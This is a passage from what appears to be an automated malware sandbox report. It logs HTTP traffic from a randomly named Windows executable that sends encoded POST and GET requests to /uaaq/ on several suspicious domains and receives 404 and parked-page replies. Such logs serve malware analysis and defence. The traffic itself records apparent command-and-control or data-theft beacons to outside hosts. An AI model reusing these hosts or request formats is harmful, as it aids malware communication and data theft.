                                                                                    Data Ascii: 9pG0L=R8SzfXoH2bXhaoEwLTXVmjFQ6fzg4DNUvHmWgLiOCayIO/riav9z5oLtQ1+Sohb0NSe6vAL6TJXE1tfRb9jQgsxKsZPm6YOCMvXGMNLI5l3yPgIwOrD5NFCOoX9fo7yAuzQ5uCh4MTDVK30OcGE+Lqx0LKsYj3Es0NwMJfm/Pu5F9SvkDDhMJgPXhbVpuWfhfeZ6aqE=
                                                                                    Dec 4, 2023 12:07:54.383419991 CET516INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:12 GMT
                                                                                    Server: Apache/2.2.15 (CentOS)
                                                                                    Content-Length: 282
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 61 61 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 75 6e 75 67 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    47192.168.11.304980131.186.11.254803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:07:56.905744076 CET1620OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.tunug.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tunug.xyz
                                                                                    Referer: http://www.tunug.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 52 38 53 7a 66 58 6f 48 32 62 58 68 61 6f 45 77 4c 54 58 56 6d 6a 46 51 36 66 7a 67 34 44 4e 55 76 48 6d 57 67 4c 69 4f 43 61 36 49 4f 4e 54 69 62 4d 6c 7a 34 6f 4c 74 50 46 2b 54 6f 68 62 31 4e 53 58 79 76 41 48 4d 54 4c 76 45 31 4f 58 52 64 4d 6a 51 75 73 78 4b 78 4a 50 6e 6e 49 50 59 4d 76 48 43 4d 4e 62 49 35 6c 33 79 50 69 38 77 4a 2b 76 35 4c 46 43 50 2f 6e 39 62 69 72 79 6b 75 7a 49 44 75 43 6c 6f 4d 69 6a 56 4b 58 6b 4f 64 30 38 2b 45 71 78 79 48 71 73 41 6a 79 64 79 30 4e 73 41 4a 65 53 52 50 75 42 46 2f 31 71 62 58 78 74 34 65 53 75 75 73 49 78 70 71 77 58 33 41 39 56 34 45 4e 50 33 69 39 35 46 67 48 6e 6d 6b 58 45 70 4c 67 64 53 56 74 4e 75 51 35 66 79 33 75 4e 77 75 4a 6c 48 34 78 72 6e 68 4a 34 2b 43 66 33 58 59 48 6b 67 37 4e 6a 4f 53 52 44 57 70 78 59 43 33 64 57 44 44 53 66 52 6d 78 77 50 4a 76 33 4b 46 4c 76 48 79 62 6d 38 4a 34 4a 45 68 6e 36 4f 32 70 39 38 58 61 35 31 61 53 35 58 47 34 6f 38 66 69 34 65 72 63 42 43 55 44 46 34 63 2b 2b 6c 54 6d 6c 37 71 36 72 58 70 37 64 78 38 31 33 54 43 55 6f 74 6d 7a 77 52 46 38 53 56 37 6d 51 41 4b 53 6a 38 34 63 6f 54 38 6f 2b 6e 4d 72 53 64 68 41 35 44 2f 70 66 56 52 30 7a 52 76 48 56 44 4e 4e 47 38 52 58 4f 5a 35 71 51 68 58 51 41 69 73 58 74 45 57 37 47 4d 69 73 44 56 44 63 4f 52 50 4e 74 72 70 32 4a 42 39 2b 54 5a 4a 76 79 4d 6e 34 76 33 37 76 4c 75 57 54 65 43 48 36 49 41 2f 33 73 67 6e 6d 4d 64 56 4f 30 4b 73 66 57 52 42 4c 41 5a 47 58 38 67 32 2f 32 63 59 41 72 72 31 6e 66 58 56 64 58 72 32 53 52 4e 75 78 6a 55 53 43 74 54 55 71 6b 2b 4d 31 34 69 76 44 6c 75 2f 44 4a 2f 4c 41 6d 64 64 41 56 62 41 61 63 71 59 71 4b 6c 4b 76 44 31 30 6e 39 71 2b 78 41 68 79 6f 47 62 38 50 48 46 42 69 53 55 76 75 48 37 2f 41 63 6c 32 76 6f 49 5a 53 46 69 36 62 47 75 54 58 37 56 65 63 6b 64 63 49 48 42 2f 70 71 78 43 44 6a 37 42 73 41 6e 41 6d 68 79 4f 53 37 65 76 79 71 4b 5a 4e 74 57 79 47 63 64 44 4a 46 6b 54 47 6f 4e 44 68 6b 68 55 78 4f 5a 54 44 65 68 74 74 39 33 4c 36 71 58 54 4c 62 37 32 6e 4c 6c 50 65 66 6b 70 46 35 77 76 31 37 44 36 46 6d 49 42 79 64 32 79 31 4f 7a 6c 47 37 50 76 6b 52 36 6a 66 4f 4d 77 67 56 6c 75 54 61 54 35 34 70 57 6a 4c 68 42 73 51 6a 78 70 36 55 49 62 46 77 39 72 64 68 41 45 30 59 39 62 69 4f 34 4f 45 70 71 75 59 51 37 54 59 54 4a 46 51 52 6f 4f 54 63 7a 33 68 6c 31 4d 2f 55 6e 38 76 38 46 58 53 56 44 7a 37 4e 35 57 6f 6c 78 4a 7a 48 46 43 41 57 6f 2b 63 68 66 79 49 73 4e 49 47 50 67 55 41 4c 6c 4e 67 4d 4b 39 76 4a 77 4c 5a 45 67 64 6a 5a 6d 38 53 48 70 41 37 35 72 38 32 42 6e 6c 64 43 35 79 6f 52 42 58 34 69 6f 4b 57 4b 48 79 49 57 4a 70 76 6b 65 36 4b 4f 57 39 50 6c 66 2b 76 2b 37 2f 55 58 49 35 76 6b 42 4b 53 47 65 77 31 41 58 69 32 70 42 66 74 52 39 4a 48 56 32 4e 55 6b 78 6e 41 55 54 31 65 64 43 4f 71 4e 6b 63 33 35 66 6e 2b 4d 66 30 48 46 50 6b 44 6a 76 52 46 54 63 6c 74 6c 78 4a 77 6a 69 4f 75 51 44 73 38 78 4b 54 6f 52 65 56 75 36 50 6e 6f 66 63 4e 6e 64 2f 44 63 38 48 59 69 6c 67 79 56 77 62 2b 34 4c 69 56 5a 50 35 72 52 64 59 4d 31 34 52 4e 61 39 38 4e 6d 54 6a 53 35 75 41 47 6b 4d 4c 42 69 35 72 45 4a 49 46 78 56 4b 47 43 62 65 5a 6c 43 41 63 64 4b 4d 50 53 58 6d 55 79 6a 32 65 62 71 5a 56 34 2b 52 73 53 33 6f 69 48 62 54 64 64 6a 37 48 2f 66 62 35 63 65 42 51 32 58 32 78 6f 66 5a 71 50 70 39 42 62 6e 41 47 30 72 70 37 51 45 57 70 31 37 51 65 42 74 43 68 6c 41 71 57 74 2b 2b 38 6f 53 34 54 74 69 4e 31
                                                                                    Data Ascii: 9pG0L=R8SzfXoH2bXhaoEwLTXVmjFQ6fzg4DNUvHmWgLiOCa6IONTibMlz4oLtPF+Tohb1NSXyvAHMTLvE1OXRdMjQusxKxJPnnIPYMvHCMNbI5l3yPi8wJ+v5LFCP/n9birykuzIDuCloMijVKXkOd08+EqxyHqsAjydy0NsAJeSRPuBF/1qbXxt4eSuusIxpqwX3A9V4ENP3i95FgHnmkXEpLgdSVtNuQ5fy3uNwuJlH4xrnhJ4+Cf3XYHkg7NjOSRDWpxYC3dWDDSfRmxwPJv3KFLvHybm8J4JEhn6O2p98Xa51aS5XG4o8fi4ercBCUDF4c++lTml7q6rXp7dx813TCUotmzwRF8SV7mQAKSj84coT8o+nMrSdhA5D/pfVR0zRvHVDNNG8RXOZ5qQhXQAisXtEW7GMisDVDcORPNtrp2JB9+TZJvyMn4v37vLuWTeCH6IA/3sgnmMdVO0KsfWRBLAZGX8g2/2cYArr1nfXVdXr2SRNuxjUSCtTUqk+M14ivDlu/DJ/LAmddAVbAacqYqKlKvD10n9q+xAhyoGb8PHFBiSUvuH7/Acl2voIZSFi6bGuTX7VeckdcIHB/pqxCDj7BsAnAmhyOS7evyqKZNtWyGcdDJFkTGoNDhkhUxOZTDehtt93L6qXTLb72nLlPefkpF5wv17D6FmIByd2y1OzlG7PvkR6jfOMwgVluTaT54pWjLhBsQjxp6UIbFw9rdhAE0Y9biO4OEpquYQ7TYTJFQRoOTcz3hl1M/Un8v8FXSVDz7N5WolxJzHFCAWo+chfyIsNIGPgUALlNgMK9vJwLZEgdjZm8SHpA75r82BnldC5yoRBX4ioKWKHyIWJpvke6KOW9Plf+v+7/UXI5vkBKSGew1AXi2pBftR9JHV2NUkxnAUT1edCOqNkc35fn+Mf0HFPkDjvRFTcltlxJwjiOuQDs8xKToReVu6PnofcNnd/Dc8HYilgyVwb+4LiVZP5rRdYM14RNa98NmTjS5uAGkMLBi5rEJIFxVKGCbeZlCAcdKMPSXmUyj2ebqZV4+RsS3oiHbTddj7H/fb5ceBQ2X2xofZqPp9BbnAG0rp7QEWp17QeBtChlAqWt++8oS4TtiN1
                                                                                    Dec 4, 2023 12:07:57.127574921 CET516INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:15 GMT
                                                                                    Server: Apache/2.2.15 (CentOS)
                                                                                    Content-Length: 282
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 61 61 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 75 6e 75 67 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    48192.168.11.304980231.186.11.254803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:07:59.651575089 CET421OUTGET /uaaq/?9pG0L=c+6TcgwS74LYb/BtPGzNqx0v24f4gkgpuEv8j4KmZe3KWMq5Vv4U79mpWhSZrgbcOhaTjzTbW4/9rezZQ6Dag7ZY/b6dvvuFMQ==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.tunug.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:07:59.869884014 CET516INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:18 GMT
                                                                                    Server: Apache/2.2.15 (CentOS)
                                                                                    Content-Length: 282
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 61 61 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 75 6e 75 67 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    49192.168.11.304980366.96.162.139803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:05.146527052 CET725OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.dabblefurnishings.space
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.dabblefurnishings.space
                                                                                    Referer: http://www.dabblefurnishings.space/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 55 4d 6a 4f 7a 6e 73 44 62 52 58 4e 35 68 78 56 62 32 6c 64 4b 76 32 38 4c 38 50 62 30 36 48 4a 6d 38 34 67 78 54 62 48 58 4f 69 66 4a 45 35 5a 6b 78 35 51 31 51 30 2b 4a 64 64 70 38 43 59 78 38 71 31 78 7a 46 34 4c 6b 4f 4d 6b 52 74 56 44 79 71 50 68 6a 50 2f 75 48 57 74 67 6a 41 69 65 37 42 4a 4f 5a 72 4a 54 4b 69 38 76 77 58 48 4e 70 35 53 51 77 71 52 41 65 2f 67 47 39 69 33 4a 34 52 66 5a 77 4f 6f 75 79 41 44 39 49 79 4d 41 41 6e 72 48 39 78 71 77 6a 78 51 67 77 55 48 48 46 59 59 46 67 66 47 4d 56 43 33 65 77 6b 2b 75 34 51 3d 3d
                                                                                    Data Ascii: 9pG0L=UMjOznsDbRXN5hxVb2ldKv28L8Pb06HJm84gxTbHXOifJE5Zkx5Q1Q0+Jddp8CYx8q1xzF4LkOMkRtVDyqPhjP/uHWtgjAie7BJOZrJTKi8vwXHNp5SQwqRAe/gG9i3J4RfZwOouyAD9IyMAAnrH9xqwjxQgwUHHFYYFgfGMVC3ewk+u4Q==
                                                                                    Dec 4, 2023 12:08:05.270065069 CET1143INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:05 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 867
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    50192.168.11.304980466.96.162.139803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:07.769362926 CET745OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.dabblefurnishings.space
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.dabblefurnishings.space
                                                                                    Referer: http://www.dabblefurnishings.space/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 55 4d 6a 4f 7a 6e 73 44 62 52 58 4e 72 53 70 56 58 78 78 64 42 76 32 2f 49 38 50 62 2b 61 47 68 6d 38 30 67 78 52 33 78 58 38 57 66 49 6d 68 5a 6c 31 74 51 79 51 30 2b 43 39 64 67 6a 53 59 2b 38 71 77 4d 7a 41 51 4c 6b 4f 59 6b 52 73 6c 44 79 64 6a 67 67 2f 2f 73 50 32 74 69 38 77 69 65 37 42 4a 4f 5a 72 64 70 4b 69 30 76 77 6e 33 4e 37 4e 47 58 73 61 52 42 5a 2f 67 47 71 79 33 46 34 52 66 76 77 4c 4d 45 79 47 66 39 49 79 63 41 41 79 48 45 7a 78 72 37 39 42 52 79 77 58 79 56 66 76 6c 59 78 2b 47 43 47 51 4f 56 78 78 53 39 2f 73 61 77 75 65 39 31 38 75 63 7a 54 4c 68 77 67 64 6d 68 63 52 6f 3d
                                                                                    Data Ascii: 9pG0L=UMjOznsDbRXNrSpVXxxdBv2/I8Pb+aGhm80gxR3xX8WfImhZl1tQyQ0+C9dgjSY+8qwMzAQLkOYkRslDydjgg//sP2ti8wie7BJOZrdpKi0vwn3N7NGXsaRBZ/gGqy3F4RfvwLMEyGf9IycAAyHEzxr79BRywXyVfvlYx+GCGQOVxxS9/sawue918uczTLhwgdmhcRo=
                                                                                    Dec 4, 2023 12:08:07.883236885 CET1143INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:07 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 867
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
